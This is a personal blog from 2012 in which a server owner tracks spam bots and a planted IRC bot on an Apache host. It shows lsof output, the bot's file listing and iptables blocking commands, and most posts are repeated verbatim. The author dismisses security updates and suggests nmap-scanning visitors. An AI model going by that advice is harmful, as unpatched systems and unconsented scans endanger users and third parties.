In order to have full security and prevent future hackers from gaining access via proxy servers to my site I have instigated a suit of shell scripts that manipulte the iptable and pattern match
a variety of these attempts.
It works on any common garden variety of linux that needs to run apache and can easily be configured to allow and disallow good and bad ip's respectively.
It can be obtained via email to sales@housebyte.co.uk
Friday, 30 March 2012
Thursday, 15 March 2012
Conclusive Remarks
I am running a simple setup and everything works. I use older machines so every once in a while I have a hardware problem.
Currently the version of OS that I use is way behind the current version and so you might think this affects security as the updates are being done for the most recent kernels.
This isnt an issue for me as much as it is for everyone else. I would prefer to fix
my problems then have to fork out the expense of buying the latest hardware needed to run current versions of most OS's
Less is more. Why are we spiralling into update addiction this is not a viable economy. Information systems have become an occupation and not just a tool or a means to an end.
Discuss?
I am running an older system which agreed is more open to vulnerablitys. But I am not going to subscribe to continous updates for my hardware to be able to stay in the game. If they want to use my machine to run servers on and theyre listed in my logs I can block them. However If they arent or theyre processes are hidden from lsof or ps then I am in trouble. When the cpu on my machine max's out because of all the spawned servers one bot was able to create then I know I am better having an old system which just stops working if its overloaded than a new one that maybe doesnt no when Its being over run.
In fact I dont like updates that much - I figure if it aint broke why fix it. Of course when something goes wrong I can run an update , besides it stops the message coming up.
Well I hope this was a useful blog. As I have to repair and re-repair my server I will post more as I learn it.
Thanks and stay Tuned
Currently the version of OS that I use is way behind the current version and so you might think this affects security as the updates are being done for the most recent kernels.
This isnt an issue for me as much as it is for everyone else. I would prefer to fix
my problems then have to fork out the expense of buying the latest hardware needed to run current versions of most OS's
Less is more. Why are we spiralling into update addiction this is not a viable economy. Information systems have become an occupation and not just a tool or a means to an end.
Discuss?
I am running an older system which agreed is more open to vulnerablitys. But I am not going to subscribe to continous updates for my hardware to be able to stay in the game. If they want to use my machine to run servers on and theyre listed in my logs I can block them. However If they arent or theyre processes are hidden from lsof or ps then I am in trouble. When the cpu on my machine max's out because of all the spawned servers one bot was able to create then I know I am better having an old system which just stops working if its overloaded than a new one that maybe doesnt no when Its being over run.
In fact I dont like updates that much - I figure if it aint broke why fix it. Of course when something goes wrong I can run an update , besides it stops the message coming up.
Well I hope this was a useful blog. As I have to repair and re-repair my server I will post more as I learn it.
Thanks and stay Tuned
How do I identify a Proxy CIDR malicous IP to be blocked?
Well you've done grep on the access_log using wp-comments
tail /var/log/httpd/access_log | grep POST | awk '{print $1}'
This will get you a list of ip's that access the wp-comments to POST page on your blog look at their frequency
You could make a block list from the repeat offenders
tail -c 50000 /var/log/httpd/access_log | grep POST | awk '{print $1}' | sort | uniq -c | sort -n
Check those lowest on the list using whois to establish whether they are CIDR's - that is whether they are proxy server being used by a hacker program to hide behind.
Then add them to your block list using
iptables -A INPUT -s 203.146.129.247 -j DROP
iptables -A OUTPUT -d 203.146.129.247 -j DROP
iptables-save
as before
You can look for other patterns in how different IP's access your site.
Use grep for this. Remember its probable the same machine using different IP's to hide its identity. You can check this by looking at the OS information in the access_log.
It will show the same OS type doing the same thing but using different IP's that are proxys.
The other method would be using the lsof command to list active tcp connections that
shouldnt be there - grab the ip's and then do another whois to find out what they are.
If they are hosts then there is no reason why another host has access your web server and that means they should be blocked otherwise they might just be an isp which means theyre either a genuine visitor listed in the access_log or not. Use nmap to check them out. See what services theyre running and if they warrant being blocked.
tail /var/log/httpd/access_log | grep POST | awk '{print $1}'
This will get you a list of ip's that access the wp-comments to POST page on your blog look at their frequency
You could make a block list from the repeat offenders
tail -c 50000 /var/log/httpd/access_log | grep POST | awk '{print $1}' | sort | uniq -c | sort -n
Check those lowest on the list using whois to establish whether they are CIDR's - that is whether they are proxy server being used by a hacker program to hide behind.
Then add them to your block list using
iptables -A INPUT -s 203.146.129.247 -j DROP
iptables -A OUTPUT -d 203.146.129.247 -j DROP
iptables-save
as before
You can look for other patterns in how different IP's access your site.
Use grep for this. Remember its probable the same machine using different IP's to hide its identity. You can check this by looking at the OS information in the access_log.
It will show the same OS type doing the same thing but using different IP's that are proxys.
The other method would be using the lsof command to list active tcp connections that
shouldnt be there - grab the ip's and then do another whois to find out what they are.
If they are hosts then there is no reason why another host has access your web server and that means they should be blocked otherwise they might just be an isp which means theyre either a genuine visitor listed in the access_log or not. Use nmap to check them out. See what services theyre running and if they warrant being blocked.
To start preventing further web attacks from proxy servers
As you may know there are many preventative measures to prevent different attacks from ever getting near your server
-using block lists in iptables
-updating apache web server
-running minimal services
-using a proxy server
-keeping uptodate installing security features
but you will often find this will not prevent attacks from unlisted IP's. IP's that havent been listed in your block list. For these you can run simple scripts that reduce the damage they can do. Restricting their ability to access features of the site for the purpose of posting comments and generating backlinks etc.
Worpress can be configured to prevent any comments being made from unregestered users.
But this might not stop the server being overloaded by bot's that use unique IP's (proxys) to access the site and attempt a post. Often reffered to as scraping.
You can list these attempts by simply using
tail /var/log/httpd/access_log
You will see they will happen every few minutes to post / or register to post.
Get a list of the IP's they use and create your very own block list. Thats a start and there are many block lists out there. But is this sufficient and do we really need to block the world can we not filter it instead.
Well I did some thinking and decided I wanted to restrict the number of servers spawned for these nefarious purposes. For this I wrote a script which can be run by cron every 15 minutes or so it looks to see if theyre are too many servers running and if there is it shuts them down and restarts the server. Simple but effective and this prevents multiple requests overloading the machine.
But guess what even when I shutdown the server some http requests were still running this was another malicious program which had launched its own server on my system.
To shut it down I removed a cron entry.
Deleted its files saved in the /tmp directory, and used kill -9 on the pids that were still running.
Then the script switches the server back on and tests to make sure my websites can be accessed. Its even got its own log file.
Of course these solutions treat the symptoms and not the cause which would need a backup and reinstall.
But seriously who wants the hassle of doing that everytime it happens.
Here is the output from lsof and ps showing the malicious programs and theyre PID's to be killed:-
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache cwd DIR 3,2 0 803968 /tmp/mnc (deleted)
perl 4628 apache rtd DIR 3,2 4096 2 /
perl 4628 apache txt REG 3,2 1151198 678050 /usr/bin/perl
perl 4628 apache mem REG 3,2 16270 71646 /usr/local/lib/perl5/5.13.9/i686-linux/auto/IO/IO.so
perl 4628 apache mem REG 3,2 33005 37299 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Encode/Encode.so
perl 4628 apache mem REG 3,2 120725 37269 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Compress/Raw/Zlib/Zlib.so
perl 4628 apache mem REG 3,2 18521 87802 /usr/local/lib/perl5/5.13.9/i686-linux/auto/File/Glob/Glob.so
perl 4628 apache mem REG 3,2 14748 71596 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Fcntl/Fcntl.so
perl 4628 apache mem REG 3,2 50944 816050 /lib/libnss_files-2.3.3.so
perl 4628 apache mem REG 3,2 106892 820617 /lib/ld-2.3.3.so
perl 4628 apache mem REG 3,2 1455084 820618 /lib/tls/libc-2.3.3.so
perl 4628 apache mem REG 3,2 16708 820621 /lib/libdl-2.3.3.so
perl 4628 apache mem REG 3,2 214796 820622 /lib/tls/libm-2.3.3.so
perl 4628 apache mem REG 3,2 15688 816093 /lib/libutil-2.3.3.so
perl 4628 apache mem REG 3,2 76588 820624 /lib/libresolv-2.3.3.so
perl 4628 apache mem REG 3,2 22172 816047 /lib/libnss_dns-2.3.3.so
perl 4628 apache mem REG 3,2 22781 71614 /usr/local/lib/perl5/5.13.9/i686-linux/auto/List/Util/Util.so
perl 4628 apache mem REG 3,2 10220 71609 /usr/local/lib/perl5/5.13.9/i686-linux/auto/I18N/Langinfo/Langinfo.so
perl 4628 apache mem REG 3,2 71635 71667 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Storable/Storable.so
perl 4628 apache mem REG 3,2 28408 820630 /lib/libcrypt-2.3.3.so
perl 4628 apache mem REG 3,2 28411 71636 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Socket/Socket.so
perl 4628 apache mem REG 3,2 96248 820631 /lib/libnsl-2.3.3.so
perl 4628 apache mem REG 3,2 12876 87783 /usr/local/lib/perl5/5.13.9/i686-linux/auto/MIME/Base64/Base64.so
perl 4628 apache mem REG 3,2 40259136 672802 /usr/lib/locale/locale-archive
perl 4628 apache 0r CHR 1,3 887233 /dev/null
perl 4628 apache 1w FIFO 0,7 190204 pipe
perl 4628 apache 2w REG 3,2 467407320 280611 /var/log/httpd/error_log
perl 4628 apache 3u IPv6 28208 TCP *:webcache (LISTEN)
perl 4628 apache 4u IPv6 28210 TCP *:tproxy (LISTEN)
perl 4628 apache 5u IPv6 28213 TCP *:8085 (LISTEN)
perl 4628 apache 6u IPv6 28215 TCP *:http (LISTEN)
perl 4628 apache 7u IPv6 28217 TCP *:https (LISTEN)
perl 4628 apache 8r FIFO 0,7 28273 pipe
perl 4628 apache 9w FIFO 0,7 28273 pipe
perl 4628 apache 10w REG 3,2 467407320 280611 /var/log/httpd/error_log
perl 4628 apache 11w REG 3,2 109980 280612 /var/log/httpd/ssl_error_log
perl 4628 apache 12w REG 3,2 41574053 280610 /var/log/httpd/access_log
perl 4628 apache 13w REG 3,2 82395 279420 /var/log/httpd/ssl_access_log
perl 4628 apache 14w REG 3,2 96494 279421 /var/log/httpd/ssl_request_log
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
perl 4628 apache 16u unix 0x08d40980 190197 socket
perl 4628 apache 17u IPv4 190377 TCP 192.168.1.36:33027->203.146.129.247:ircd (ESTABLISHED)
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache 6u IPv6 28215 TCP *:http (LISTEN)
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache 7u IPv6 28217 TCP *:https (LISTEN)
1 S apache 4628 1 5 75 0 - 2958 - 22:35 ? 00:04:25 /usr/sbin/apache2 -k start
4 S root 5661 2767 0 75 0 - 1142 pipe_w 23:51 pts/0 00:00:00 grep apache
Here are the files placed on my server used to spawn a server :-
tmp/mnc/
tmp/mnc/text/
tmp/mnc/text/motd
tmp/mnc/text/banner
tmp/mnc/httpd
tmp/mnc/sUx.conf
tmp/mnc/Lucifer.chn
tmp/mnc/pid.Lucifer
tmp/mnc/Lucifer
tmp/mnc/language/
tmp/mnc/language/console.german.lang
tmp/mnc/language/filesys.german.lang
tmp/mnc/language/assoc.german.lang
tmp/mnc/language/bs_data.Lucifer
tmp/mnc/language/core.french.lang
tmp/mnc/language/core.german.lang
tmp/mnc/language/wire.english.lang
tmp/mnc/language/core.english.lang
tmp/mnc/language/console.english.lang
tmp/mnc/language/assoc.english.lang
tmp/mnc/language/notes.english.lang
tmp/mnc/language/filesys.english.lang
tmp/mnc/language/wire.german.lang
tmp/mnc/language/wire.french.lang
tmp/mnc/language/filesys.french.lang
tmp/mnc/language/notes.german.lang
tmp/mnc/tcl
tmp/mnc/logs/
tmp/mnc/logs/CONTENTS
tmp/mnc/scripts/
tmp/mnc/scripts/http.tcl
tmp/mnc/scripts/action.fix.tcl
tmp/mnc/scripts/ipwhois.tcl
tmp/mnc/scripts/dns.tcl
tmp/mnc/scripts/alltools.tcl
tmp/mnc/scripts/port.tcl
tmp/mnc/scripts/version.tcl
tmp/mnc/scripts/seen.tcl
tmp/mnc/scripts/sUx.tcl
tmp/mnc/Lucifer.d
tmp/mnc/run
tmp/mnc/"\001
tmp/mnc/xh
tmp/mnc/Lucifer.usr
tmp/mnc/help/
tmp/mnc/help/cmds1.help
tmp/mnc/help/cmds2.help
tmp/mnc/help/irc.help
tmp/mnc/help/channels.help
tmp/mnc/help/seen.help
tmp/mnc/help/msg/
tmp/mnc/help/msg/irc.help
tmp/mnc/help/msg/seen.help
tmp/mnc/help/msg/userinfo.help
tmp/mnc/help/msg/notes.help
tmp/mnc/help/assoc.help
tmp/mnc/help/share.help
tmp/mnc/help/console.help
tmp/mnc/help/server.help
tmp/mnc/help/userinfo.help
tmp/mnc/help/set/
tmp/mnc/help/set/ctcp.help
tmp/mnc/help/set/cmds1.help
tmp/mnc/help/set/cmds2.help
tmp/mnc/help/set/irc.help
tmp/mnc/help/set/channels.help
tmp/mnc/help/set/transfer.help
tmp/mnc/help/set/compress.help
tmp/mnc/help/set/console.help
tmp/mnc/help/set/server.help
tmp/mnc/help/set/filesys.help
tmp/mnc/help/set/notes.help
tmp/mnc/help/filesys.help
tmp/mnc/help/cmd_resolve.help
tmp/mnc/help/chaninfo.help
tmp/mnc/help/core.help
tmp/mnc/help/notes.help
tmp/mnc/Lucifer.dir
tmp/mnc/doc/
tmp/mnc/doc/man1/
tmp/mnc/doc/man1/eggdrop.1
tmp/mnc/doc/UPDATES1.6
tmp/mnc/doc/tricks
tmp/mnc/doc/settings/
tmp/mnc/doc/settings/contents
tmp/mnc/doc/settings/mod.channel
tmp/mnc/doc/settings/core.settings
tmp/mnc/doc/settings/tricks
tmp/mnc/doc/settings/mod.woobie
tmp/mnc/doc/settings/mod.transfer
tmp/mnc/doc/settings/mod.compress
tmp/mnc/doc/settings/mod.assoc
tmp/mnc/doc/settings/mod.filesys
tmp/mnc/doc/settings/mod.ctcp
tmp/mnc/doc/settings/mod.wire
tmp/mnc/doc/settings/mod.irc
tmp/mnc/doc/settings/mod.seen
tmp/mnc/doc/settings/mod.share
tmp/mnc/doc/settings/mod.console
tmp/mnc/doc/settings/mod.dns
tmp/mnc/doc/settings/mod.notes
tmp/mnc/doc/settings/mod.server
tmp/mnc/doc/settings/mod.blowfish
tmp/mnc/doc/text-substitutions.doc
tmp/mnc/doc/compiling.FAQ
tmp/mnc/doc/patch.howto
tmp/mnc/doc/CONTENTS
tmp/mnc/doc/MODULES
tmp/mnc/doc/BUG-REPORT
tmp/mnc/doc/tcl-commands.doc
tmp/mnc/doc/KNOWN-PROBLEMS
tmp/mnc/doc/html/
tmp/mnc/doc/html/app-weird.html
tmp/mnc/doc/html/app-problems.html
tmp/mnc/doc/html/starting.html
tmp/mnc/doc/html/mod-server.html
tmp/mnc/doc/html/mod-assoc.html
tmp/mnc/doc/html/mod-share.html
tmp/mnc/doc/html/app-tricks.html
tmp/mnc/doc/html/about.html
tmp/mnc/doc/html/mod-compress.html
tmp/mnc/doc/html/app-sharing.html
tmp/mnc/doc/html/features.html
tmp/mnc/doc/html/egg-core.html
tmp/mnc/doc/html/compiling.html
tmp/mnc/doc/html/bans.html
tmp/mnc/doc/html/app-textsub.html
tmp/mnc/doc/html/faqs.html
tmp/mnc/doc/html/mod-wire.html
tmp/mnc/doc/html/install.html
tmp/mnc/doc/html/sharing.html
tmp/mnc/doc/html/mod-notes.html
tmp/mnc/doc/html/mod-filesys.html
tmp/mnc/doc/html/index.html
tmp/mnc/doc/html/authors.html
tmp/mnc/doc/html/users.html
tmp/mnc/doc/html/mod-dns.html
tmp/mnc/doc/html/mod-irc.html
tmp/mnc/doc/html/party.html
tmp/mnc/doc/html/flags.html
tmp/mnc/doc/html/botnet.html
tmp/mnc/doc/html/news.html
tmp/mnc/doc/html/mod-blowfish.html
tmp/mnc/doc/html/mod-channels.html
tmp/mnc/doc/html/readme.html
tmp/mnc/doc/BOTNET
tmp/mnc/doc/eggdrop.doc
tmp/mnc/doc/UPDATES.pre1.5
tmp/mnc/doc/UPDATES1.5
tmp/mnc/Lucifer.upd
tmp/mnc/sUx
tmp/mnc/Lucifer.run
tmp/mnc/filesys/
tmp/mnc/filesys/incoming/
tmp/mnc/t3394
tmp/mnc/tmp/
This is the important bit containing all the info you need using lsof -p PID
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
perl 4628 apache 16u unix 0x08d40980 190197 socket
perl 4628 apache 17u IPv4 190377 TCP 192.168.1.36:33027->203.146.129.247:ircd (ESTABLISHED)
The PID you can pull from doing ps -elf command with grep apache - this gets you a list of all the servers spawned and their PID's
Look for the one there after you have issued 'service httpd stop'
It shouldnt be there but it is now you better kill it so you can restart httpd.
My internal IP is 192.168.1.36
The malicious program creates a link over TCP to 203.146.129.247 and rs2.justhost.com
Both of these connections shouldnt be there you can look for something similar using these two commands:
ps -elf | grep apache or lsof -i tcp:80
then
lsof -p PID ( using the PID from above )
Then
kill PID
and your done, after you can restart your httpd server. Dont forget to remove any
cron entrys that shouldnt be there and remove any files in the /tmp directory that also shouldnt be there.
Check /var/spool/cron/
You can block all the proxy servers listed by doing a grep on the /var/log/httpd/access_log
To block an IP or a CIDR use the following command using the above mal-IP
203.146.129.247
iptables -A INPUT -s 203.146.129.247 -j DROP
iptables -A OUTPUT -d 203.146.129.247 -j DROP
iptables-save
Happy hunting.
-using block lists in iptables
-updating apache web server
-running minimal services
-using a proxy server
-keeping uptodate installing security features
but you will often find this will not prevent attacks from unlisted IP's. IP's that havent been listed in your block list. For these you can run simple scripts that reduce the damage they can do. Restricting their ability to access features of the site for the purpose of posting comments and generating backlinks etc.
Worpress can be configured to prevent any comments being made from unregestered users.
But this might not stop the server being overloaded by bot's that use unique IP's (proxys) to access the site and attempt a post. Often reffered to as scraping.
You can list these attempts by simply using
tail /var/log/httpd/access_log
You will see they will happen every few minutes to post / or register to post.
Get a list of the IP's they use and create your very own block list. Thats a start and there are many block lists out there. But is this sufficient and do we really need to block the world can we not filter it instead.
Well I did some thinking and decided I wanted to restrict the number of servers spawned for these nefarious purposes. For this I wrote a script which can be run by cron every 15 minutes or so it looks to see if theyre are too many servers running and if there is it shuts them down and restarts the server. Simple but effective and this prevents multiple requests overloading the machine.
But guess what even when I shutdown the server some http requests were still running this was another malicious program which had launched its own server on my system.
To shut it down I removed a cron entry.
Deleted its files saved in the /tmp directory, and used kill -9 on the pids that were still running.
Then the script switches the server back on and tests to make sure my websites can be accessed. Its even got its own log file.
Of course these solutions treat the symptoms and not the cause which would need a backup and reinstall.
But seriously who wants the hassle of doing that everytime it happens.
Here is the output from lsof and ps showing the malicious programs and theyre PID's to be killed:-
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache cwd DIR 3,2 0 803968 /tmp/mnc (deleted)
perl 4628 apache rtd DIR 3,2 4096 2 /
perl 4628 apache txt REG 3,2 1151198 678050 /usr/bin/perl
perl 4628 apache mem REG 3,2 16270 71646 /usr/local/lib/perl5/5.13.9/i686-linux/auto/IO/IO.so
perl 4628 apache mem REG 3,2 33005 37299 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Encode/Encode.so
perl 4628 apache mem REG 3,2 120725 37269 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Compress/Raw/Zlib/Zlib.so
perl 4628 apache mem REG 3,2 18521 87802 /usr/local/lib/perl5/5.13.9/i686-linux/auto/File/Glob/Glob.so
perl 4628 apache mem REG 3,2 14748 71596 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Fcntl/Fcntl.so
perl 4628 apache mem REG 3,2 50944 816050 /lib/libnss_files-2.3.3.so
perl 4628 apache mem REG 3,2 106892 820617 /lib/ld-2.3.3.so
perl 4628 apache mem REG 3,2 1455084 820618 /lib/tls/libc-2.3.3.so
perl 4628 apache mem REG 3,2 16708 820621 /lib/libdl-2.3.3.so
perl 4628 apache mem REG 3,2 214796 820622 /lib/tls/libm-2.3.3.so
perl 4628 apache mem REG 3,2 15688 816093 /lib/libutil-2.3.3.so
perl 4628 apache mem REG 3,2 76588 820624 /lib/libresolv-2.3.3.so
perl 4628 apache mem REG 3,2 22172 816047 /lib/libnss_dns-2.3.3.so
perl 4628 apache mem REG 3,2 22781 71614 /usr/local/lib/perl5/5.13.9/i686-linux/auto/List/Util/Util.so
perl 4628 apache mem REG 3,2 10220 71609 /usr/local/lib/perl5/5.13.9/i686-linux/auto/I18N/Langinfo/Langinfo.so
perl 4628 apache mem REG 3,2 71635 71667 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Storable/Storable.so
perl 4628 apache mem REG 3,2 28408 820630 /lib/libcrypt-2.3.3.so
perl 4628 apache mem REG 3,2 28411 71636 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Socket/Socket.so
perl 4628 apache mem REG 3,2 96248 820631 /lib/libnsl-2.3.3.so
perl 4628 apache mem REG 3,2 12876 87783 /usr/local/lib/perl5/5.13.9/i686-linux/auto/MIME/Base64/Base64.so
perl 4628 apache mem REG 3,2 40259136 672802 /usr/lib/locale/locale-archive
perl 4628 apache 0r CHR 1,3 887233 /dev/null
perl 4628 apache 1w FIFO 0,7 190204 pipe
perl 4628 apache 2w REG 3,2 467407320 280611 /var/log/httpd/error_log
perl 4628 apache 3u IPv6 28208 TCP *:webcache (LISTEN)
perl 4628 apache 4u IPv6 28210 TCP *:tproxy (LISTEN)
perl 4628 apache 5u IPv6 28213 TCP *:8085 (LISTEN)
perl 4628 apache 6u IPv6 28215 TCP *:http (LISTEN)
perl 4628 apache 7u IPv6 28217 TCP *:https (LISTEN)
perl 4628 apache 8r FIFO 0,7 28273 pipe
perl 4628 apache 9w FIFO 0,7 28273 pipe
perl 4628 apache 10w REG 3,2 467407320 280611 /var/log/httpd/error_log
perl 4628 apache 11w REG 3,2 109980 280612 /var/log/httpd/ssl_error_log
perl 4628 apache 12w REG 3,2 41574053 280610 /var/log/httpd/access_log
perl 4628 apache 13w REG 3,2 82395 279420 /var/log/httpd/ssl_access_log
perl 4628 apache 14w REG 3,2 96494 279421 /var/log/httpd/ssl_request_log
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
perl 4628 apache 16u unix 0x08d40980 190197 socket
perl 4628 apache 17u IPv4 190377 TCP 192.168.1.36:33027->203.146.129.247:ircd (ESTABLISHED)
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache 6u IPv6 28215 TCP *:http (LISTEN)
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache 7u IPv6 28217 TCP *:https (LISTEN)
1 S apache 4628 1 5 75 0 - 2958 - 22:35 ? 00:04:25 /usr/sbin/apache2 -k start
4 S root 5661 2767 0 75 0 - 1142 pipe_w 23:51 pts/0 00:00:00 grep apache
Here are the files placed on my server used to spawn a server :-
tmp/mnc/
tmp/mnc/text/
tmp/mnc/text/motd
tmp/mnc/text/banner
tmp/mnc/httpd
tmp/mnc/sUx.conf
tmp/mnc/Lucifer.chn
tmp/mnc/pid.Lucifer
tmp/mnc/Lucifer
tmp/mnc/language/
tmp/mnc/language/console.german.lang
tmp/mnc/language/filesys.german.lang
tmp/mnc/language/assoc.german.lang
tmp/mnc/language/bs_data.Lucifer
tmp/mnc/language/core.french.lang
tmp/mnc/language/core.german.lang
tmp/mnc/language/wire.english.lang
tmp/mnc/language/core.english.lang
tmp/mnc/language/console.english.lang
tmp/mnc/language/assoc.english.lang
tmp/mnc/language/notes.english.lang
tmp/mnc/language/filesys.english.lang
tmp/mnc/language/wire.german.lang
tmp/mnc/language/wire.french.lang
tmp/mnc/language/filesys.french.lang
tmp/mnc/language/notes.german.lang
tmp/mnc/tcl
tmp/mnc/logs/
tmp/mnc/logs/CONTENTS
tmp/mnc/scripts/
tmp/mnc/scripts/http.tcl
tmp/mnc/scripts/action.fix.tcl
tmp/mnc/scripts/ipwhois.tcl
tmp/mnc/scripts/dns.tcl
tmp/mnc/scripts/alltools.tcl
tmp/mnc/scripts/port.tcl
tmp/mnc/scripts/version.tcl
tmp/mnc/scripts/seen.tcl
tmp/mnc/scripts/sUx.tcl
tmp/mnc/Lucifer.d
tmp/mnc/run
tmp/mnc/"\001
tmp/mnc/xh
tmp/mnc/Lucifer.usr
tmp/mnc/help/
tmp/mnc/help/cmds1.help
tmp/mnc/help/cmds2.help
tmp/mnc/help/irc.help
tmp/mnc/help/channels.help
tmp/mnc/help/seen.help
tmp/mnc/help/msg/
tmp/mnc/help/msg/irc.help
tmp/mnc/help/msg/seen.help
tmp/mnc/help/msg/userinfo.help
tmp/mnc/help/msg/notes.help
tmp/mnc/help/assoc.help
tmp/mnc/help/share.help
tmp/mnc/help/console.help
tmp/mnc/help/server.help
tmp/mnc/help/userinfo.help
tmp/mnc/help/set/
tmp/mnc/help/set/ctcp.help
tmp/mnc/help/set/cmds1.help
tmp/mnc/help/set/cmds2.help
tmp/mnc/help/set/irc.help
tmp/mnc/help/set/channels.help
tmp/mnc/help/set/transfer.help
tmp/mnc/help/set/compress.help
tmp/mnc/help/set/console.help
tmp/mnc/help/set/server.help
tmp/mnc/help/set/filesys.help
tmp/mnc/help/set/notes.help
tmp/mnc/help/filesys.help
tmp/mnc/help/cmd_resolve.help
tmp/mnc/help/chaninfo.help
tmp/mnc/help/core.help
tmp/mnc/help/notes.help
tmp/mnc/Lucifer.dir
tmp/mnc/doc/
tmp/mnc/doc/man1/
tmp/mnc/doc/man1/eggdrop.1
tmp/mnc/doc/UPDATES1.6
tmp/mnc/doc/tricks
tmp/mnc/doc/settings/
tmp/mnc/doc/settings/contents
tmp/mnc/doc/settings/mod.channel
tmp/mnc/doc/settings/core.settings
tmp/mnc/doc/settings/tricks
tmp/mnc/doc/settings/mod.woobie
tmp/mnc/doc/settings/mod.transfer
tmp/mnc/doc/settings/mod.compress
tmp/mnc/doc/settings/mod.assoc
tmp/mnc/doc/settings/mod.filesys
tmp/mnc/doc/settings/mod.ctcp
tmp/mnc/doc/settings/mod.wire
tmp/mnc/doc/settings/mod.irc
tmp/mnc/doc/settings/mod.seen
tmp/mnc/doc/settings/mod.share
tmp/mnc/doc/settings/mod.console
tmp/mnc/doc/settings/mod.dns
tmp/mnc/doc/settings/mod.notes
tmp/mnc/doc/settings/mod.server
tmp/mnc/doc/settings/mod.blowfish
tmp/mnc/doc/text-substitutions.doc
tmp/mnc/doc/compiling.FAQ
tmp/mnc/doc/patch.howto
tmp/mnc/doc/CONTENTS
tmp/mnc/doc/MODULES
tmp/mnc/doc/BUG-REPORT
tmp/mnc/doc/tcl-commands.doc
tmp/mnc/doc/KNOWN-PROBLEMS
tmp/mnc/doc/html/
tmp/mnc/doc/html/app-weird.html
tmp/mnc/doc/html/app-problems.html
tmp/mnc/doc/html/starting.html
tmp/mnc/doc/html/mod-server.html
tmp/mnc/doc/html/mod-assoc.html
tmp/mnc/doc/html/mod-share.html
tmp/mnc/doc/html/app-tricks.html
tmp/mnc/doc/html/about.html
tmp/mnc/doc/html/mod-compress.html
tmp/mnc/doc/html/app-sharing.html
tmp/mnc/doc/html/features.html
tmp/mnc/doc/html/egg-core.html
tmp/mnc/doc/html/compiling.html
tmp/mnc/doc/html/bans.html
tmp/mnc/doc/html/app-textsub.html
tmp/mnc/doc/html/faqs.html
tmp/mnc/doc/html/mod-wire.html
tmp/mnc/doc/html/install.html
tmp/mnc/doc/html/sharing.html
tmp/mnc/doc/html/mod-notes.html
tmp/mnc/doc/html/mod-filesys.html
tmp/mnc/doc/html/index.html
tmp/mnc/doc/html/authors.html
tmp/mnc/doc/html/users.html
tmp/mnc/doc/html/mod-dns.html
tmp/mnc/doc/html/mod-irc.html
tmp/mnc/doc/html/party.html
tmp/mnc/doc/html/flags.html
tmp/mnc/doc/html/botnet.html
tmp/mnc/doc/html/news.html
tmp/mnc/doc/html/mod-blowfish.html
tmp/mnc/doc/html/mod-channels.html
tmp/mnc/doc/html/readme.html
tmp/mnc/doc/BOTNET
tmp/mnc/doc/eggdrop.doc
tmp/mnc/doc/UPDATES.pre1.5
tmp/mnc/doc/UPDATES1.5
tmp/mnc/Lucifer.upd
tmp/mnc/sUx
tmp/mnc/Lucifer.run
tmp/mnc/filesys/
tmp/mnc/filesys/incoming/
tmp/mnc/t3394
tmp/mnc/tmp/
This is the important bit containing all the info you need using lsof -p PID
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
perl 4628 apache 16u unix 0x08d40980 190197 socket
perl 4628 apache 17u IPv4 190377 TCP 192.168.1.36:33027->203.146.129.247:ircd (ESTABLISHED)
The PID you can pull from doing ps -elf command with grep apache - this gets you a list of all the servers spawned and their PID's
Look for the one there after you have issued 'service httpd stop'
It shouldnt be there but it is now you better kill it so you can restart httpd.
My internal IP is 192.168.1.36
The malicious program creates a link over TCP to 203.146.129.247 and rs2.justhost.com
Both of these connections shouldnt be there you can look for something similar using these two commands:
ps -elf | grep apache or lsof -i tcp:80
then
lsof -p PID ( using the PID from above )
Then
kill PID
and your done, after you can restart your httpd server. Dont forget to remove any
cron entrys that shouldnt be there and remove any files in the /tmp directory that also shouldnt be there.
Check /var/spool/cron/
You can block all the proxy servers listed by doing a grep on the /var/log/httpd/access_log
To block an IP or a CIDR use the following command using the above mal-IP
203.146.129.247
iptables -A INPUT -s 203.146.129.247 -j DROP
iptables -A OUTPUT -d 203.146.129.247 -j DROP
iptables-save
Happy hunting.
Subscribe to:
Comments (Atom)